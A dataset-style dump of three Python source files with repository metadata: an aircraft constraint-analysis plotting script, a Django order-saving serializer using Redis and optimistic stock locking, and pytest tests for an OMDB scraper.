cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180)
* v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k *
(load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s *
(self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * \
(self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
V_stall_ld = 62
Cl_max_ld = 2.87
a = 10
w_s = 6000
while a >= 1:
cl = self.beta * w_s / self.q
delta_cl = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
W_S = min(W_S_1, W_S_2)
a = abs(w_s-W_S)
w_s = W_S
return W_S
allFuncs = [stall_speed, take_off, cruise,
service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 250
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m', 'feasible region-hybrid', 'feasible region-conventional']
constrains = np.array([[0, 68, 0.988, 0.5], [0, 80, 1, 0.2], [11300, 230, 0.948, 0.8],
[11900, 230, 0.78, 0.8], [3000, 100, 0.984, 0.8], [0, 100, 0.984, 0.5],
[3000, 200, 0.975, 0.6], [7000, 230, 0.96, 0.7]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
methods = [ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun,
ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun,
ConstrainsAnalysis_Mattingly_Method_with_DP_electric,
ConstrainsAnalysis_Gudmundsson_Method_with_DP_electric,
ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun,
ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun,
ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun,
ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun]
m = constrains.shape[0]
p_w = np.zeros([m, n, 8])
# plots
fig, ax = plt.subplots(3, 2, sharex=True, figsize=(10, 10))
ax = ax.flatten()
for k in range(8):
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
hp = constrains[i, 3]
# calculate p_w
if k < 4:
problem = methods[k](h, v, beta, w_s[j], hp)
if i >= 5:
p_w[i, j, k] = problem.allFuncs[-1](problem, roc=15 - 5 * (i - 5))
else:
p_w[i, j, k] = problem.allFuncs[i](problem)
elif k > 5:
problem = methods[k](h, v, beta, w_s[j], Hp=0)
if i >= 5:
p_w[i, j, k] = problem.allFuncs[-1](problem, roc=15 - 5 * (i - 5))
else:
p_w[i, j, k] = problem.allFuncs[i](problem)
elif k == 4:
if i == 1:
problem = methods[k](h, v, beta, w_s[j], hp)
p_w[i, j, k] = problem.allFuncs[i](problem)
else:
p_w[i, j, k] = p_w[i, j, 0] + p_w[i, j, 2]
else:
if i == 1:
problem = methods[k](h, v, beta, w_s[j], hp)
p_w[i, j, k] = problem.allFuncs[i](problem)
else:
p_w[i, j, k] = p_w[i, j, 1] + p_w[i, j, 3]
def func(x, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10):
f = a0 + a1*x + a2*x**2 + a3*x**3 + a4*x**4 + a5 * \
np.sin(x) + a6*np.cos(x) + a7*x**5 + \
a8*x**6 + a9*x**7 + a10*x**8
return f
if k <= 5:
if i == 1:
ax[k].plot(p_w[i, :], np.linspace(0, 50, n),
linewidth=1, color=color[i], label=constrains_name[i])
xdata, ydata = p_w[i, :, k], np.linspace(0, 150, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[i, :, k] = func(w_s, popt[0], popt[1], popt[2],
popt[3], popt[4], popt[5], popt[6], popt[7], popt[8], popt[9], popt[10])
else:
ax[k].plot(w_s, p_w[i, :, k], color=color[i],
linewidth=1, alpha=1, label=constrains_name[i])
else:
if i == 1:
ax[k-2].plot(p_w[i, :, k], np.linspace(
0, 150, n), color=color[i], linewidth=1, alpha=0.5, linestyle='--')
else:
ax[k-2].plot(w_s, p_w[i, :, k], color=color[i],
linewidth=1, alpha=0.5, linestyle='--')
if k <= 5:
ax[k].fill_between(w_s, np.amax(p_w[0:m, :, k], axis=0),
200, color='b', alpha=0.5, label=constrains_name[-2])
ax[k].set_xlim(200, 9000)
ax[k].grid()
if k <= 3:
ax[k].set_ylim(0, 50)
else:
ax[k].set_ylim(0, 150)
else:
p_w[1, :, k] = 200 / (p_w[1, -1, k] - p_w[1, 20, k]) * (w_s - p_w[1, 2, k])
ax[k-2].fill_between(w_s, np.amax(p_w[0:m, :, k], axis=0),
200, color='r', alpha=0.5, label=constrains_name[-1])
handles, labels = plt.gca().get_legend_handles_labels()
fig.legend(handles, labels, bbox_to_anchor=(0.125, 0.02, 0.75, 0.25), loc="lower left",
mode="expand", borderaxespad=0, ncol=4, frameon=False)
hp = constrains[:, 3]
plt.setp(ax[0].set_title(r'$\bf{Mattingly Method}$'))
plt.setp(ax[1].set_title(r'$\bf{Gudmundsson Method}$'))
plt.setp(ax[4:6], xlabel='Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.setp(ax[0], ylabel=r'$\bf{Turbofun}$''\n $P_{SL}$/$W_{TO}$ (W/N)')
plt.setp(ax[2], ylabel=r'$\bf{Motor}$ ''\n $P_{SL}$/$W_{TO}$ (W/N)')
plt.setp(ax[4], ylabel=r'$\bf{Turbofun+Motor}$' '\n' r'$\bf{vs.Conventional}$ ''\n $P_{SL}$/$W_{TO}$ (W/N)')
plt.subplots_adjust(bottom=0.15)
plt.suptitle(r'$\bf{Component}$' ' ' r'$\bf{P_{SL}/W_{TO}}$' ' ' r'$\bf{Diagrams}$'
' ' r'$\bf{After}$' ' ' r'$\bf{Adjust}$' ' ' r'$\bf{Degree-of-Hybridization}$'
'\n hp: take-off=' +
str(hp[0]) + ' stall-speed=' +
str(hp[1]) + ' cruise=' +
str(hp[2]) + ' service-ceiling='+
str(hp[3]) + '\n level-turn=@3000m' +
str(hp[4]) + ' climb@S-L=' +
str(hp[5]) + ' climb@3000m=' +
str(hp[6]) + ' climb@7000m=' + str(hp[7]))
plt.show()
|
[
"libao@gatech.edu"
] |
libao@gatech.edu
|
0c3066f4942d97aa5dca6faff8777426cef86b76
|
326d8b47d8349d3430b0a061e2413fdae8c07f79
|
/meiduo_mall/meiduo_mall/apps/orders/serializers.py
|
149001c7af5e0b37eeff1cd4f70143b9dffd9397
|
[
"MIT"
] |
permissive
|
dienoe/django_demo
|
1d4a9f60d1dd73c315a347eaab25f68ffd5f6cb8
|
bd8201fcc663533123efba9b1b4eee823a288bab
|
refs/heads/master
| 2020-06-13T03:17:37.966680
| 2019-07-23T02:27:00
| 2019-07-23T02:27:00
| 194,515,470
| 0
| 0
|
MIT
| 2019-07-23T02:27:01
| 2019-06-30T12:50:05
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 5,953
|
py
|
from django.db import transaction
from django_redis import get_redis_connection
from rest_framework import serializers
from goods.models import SKU
from orders.models import OrderInfo, OrderGoods
from django.utils import timezone
from decimal import Decimal
import logging
logger=logging.getLogger('django')
class CartSKUSerializer(serializers.ModelSerializer):
"""
购物车商品数据序列化器
"""
count = serializers.IntegerField(label='数量')
class Meta:
model = SKU
fields = ('id', 'name', 'default_image_url', 'price', 'count')
class OrderSettlementSerializer(serializers.Serializer):
"""
订单结算数据序列化器
"""
freight = serializers.DecimalField(label='运费', max_digits=10, decimal_places=2)
skus = CartSKUSerializer(many=True)
class SaveOrderSerializer(serializers.ModelSerializer):
"""
保存订单序列化器
"""
class Meta:
model = OrderInfo
fields = ('order_id', 'address', 'pay_method')
read_only_fields = ('order_id',)
extra_kwargs = {
'address': {
'write_only': True
},
'pay_method': {
'required': True
}
}
# 判断商品的库存
def create(self, validated_data):
"""
保存订单
:param validated_data:
:return:
"""
# 获取用户对象 suer
user=self.context['request'].user
# 生成订单编号 order_id
# 20180702150101 9位用户id
order_id=timezone.now().strftime('%Y%m%d%H%M%S')+('%09d'%user.id)
address=validated_data['address']
pay_method=validated_data['pay_method']
# 查询购物车 redis sku_id count selected
redis_conn = get_redis_connection('cart')
# hash 商品数量
redis_cart_dict = redis_conn.hgetall('cart_%s' % user.id)
# 勾选商品
redis_cart_selected = redis_conn.smembers('cart_selected_%s' % user.id)
cart = {}
# cart={
# 勾选商品信息
# sku_id:count
# }
for sku_id in redis_cart_selected:
cart[int(sku_id)] = int(redis_cart_dict[sku_id])
if not cart:
raise serializers.ValidationError('没有需要结算的商品')
# 创建事务 开启一个事务
with transaction.atomic():
# 创建保存点
save_id=transaction.savepoint()
try:
# 保存订单
# datetime-->str strftime
# str --> datetime strptime
# 创建订单基本信息表记录 OrderInfo
order=OrderInfo.objects.create(
order_id=order_id,
user=user,
address=address,
total_count=0,
total_amount=Decimal('0'),
freight=Decimal('10.00'),
pay_method=pay_method,
status=OrderInfo.ORDER_STATUS_ENUM['UNSEND'] if pay_method == OrderInfo.PAY_METHODS_ENUM['CASH'] else
OrderInfo.ORDER_STATUS_ENUM['UNPAID']
)
# 查询商品数据库 获取商品数据(库存)
sku_id_list = cart.keys()
# sku_obj_list = SKU.objects.filter(id__in=sku_id_list)
# 遍历需要结算的商品数据
for sku_id in sku_id_list:
while True:
# 查询商品最新的库存信息
sku=SKU.objects.get(id=sku_id)
# 用户需要购买的数量
sku_count=cart[sku.id]
origin_stock=sku.stock
origin_sales=sku.sales
# 判断库存
if sku.stock<sku_count:
# 回滚到保存点
transaction.savepoint_rollback(save_id)
raise serializers.ValidationError('商品%s库存不足'%sku.name)
# 库存减少 销量增加
# sku.stock-=sku_count
# sku.sales+=sku_count
# sku.save()
new_stock=origin_stock-sku_count
new_sales=origin_stock+sku_count
# update返回受影响的行数
result=SKU.objects.filter(id=sku.id,stock=origin_stock).update(stock=new_stock,sales=new_sales)
if result==0:
# 表示更新失败,有人抢了商品
# 结束本次while循环进行下一次while循环
continue
order.total_count+=sku_count
order.total_amount+=(sku.price*sku_count)
# 创建订单商品信息表记录 OrderGoods
OrderGoods.objects.create(
order=order,
sku=sku,
count=sku_count,
price=sku.price,
)
# 跳出while 循环 进行for循环
break
order.save()
except serializers.ValidationError:
raise
except Exception as e:
logging.error(e)
transaction.savepoint_rollback(save_id)
else:
transaction.savepoint_commit(save_id)
# 删除购物车中已结算的商品
pl=redis_conn.pipeline()
# hash
pl.hdel('cart_%s'%user.id,*redis_cart_selected)
# set
pl.srem('cart_selected_%s'%user.id,*redis_cart_selected)
pl.execute()
# 返回OrderInfo对象
return order
|
[
"=410947380@qq.com"
] |
=410947380@qq.com
|
3255da86222829e5b615a12861c570f0d7ed697b
|
fe65b4b23b99b355cd729e01f330b947e430f8b4
|
/qmdb/test/test_omdb.py
|
d84613a4903318c378a1482115b1266571d0483e
|
[] |
no_license
|
tijlk/qmdb
|
b0f0e7c8171d2664a1a2ce906cec419d23b56158
|
206b38e78bcc6855cd48cb24141239ec978896db
|
refs/heads/master
| 2021-01-23T04:00:36.790950
| 2019-01-01T12:24:19
| 2019-01-01T12:24:19
| 86,148,965
| 1
| 0
| null | 2018-04-04T05:12:22
| 2017-03-25T10:17:28
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,235
|
py
|
import pytest
from mock import patch
from qmdb.interfaces.omdb import OMDBScraper, InvalidIMDbIdError
from qmdb.movie.movie import Movie
from qmdb.utils.utils import no_internet
@pytest.mark.skipif(no_internet(), reason='There is no internet connection.')
def test_imdbid_to_rturl_valid_imdbid():
omdb_scraper = OMDBScraper()
tomato_url = omdb_scraper.imdbid_to_rturl(133093)
assert tomato_url == 'http://www.rottentomatoes.com/m/matrix/'
@pytest.mark.skipif(no_internet(), reason='There is no internet connection.')
def test_imdbid_to_rturl_invalid_imdbid():
omdb_scraper = OMDBScraper()
with pytest.raises(InvalidIMDbIdError):
tomato_url = omdb_scraper.imdbid_to_rturl(12345678)
assert tomato_url is None
with pytest.raises(InvalidIMDbIdError):
tomato_url = omdb_scraper.imdbid_to_rturl(None)
assert tomato_url is None
@patch.object(OMDBScraper, 'imdbid_to_rturl', lambda self, imdbid: 'http://www.rottentomatoes.com/m/the-matrix/')
def test_refresh_movie():
omdb_scraper = OMDBScraper()
movie = Movie({'crit_id': 1234, 'imdbid': 133093})
movie = omdb_scraper.refresh_movie(movie)
assert movie.tomato_url == 'http://www.rottentomatoes.com/m/the-matrix/'
|
[
"tijl.kindt@gmail.com"
] |
tijl.kindt@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.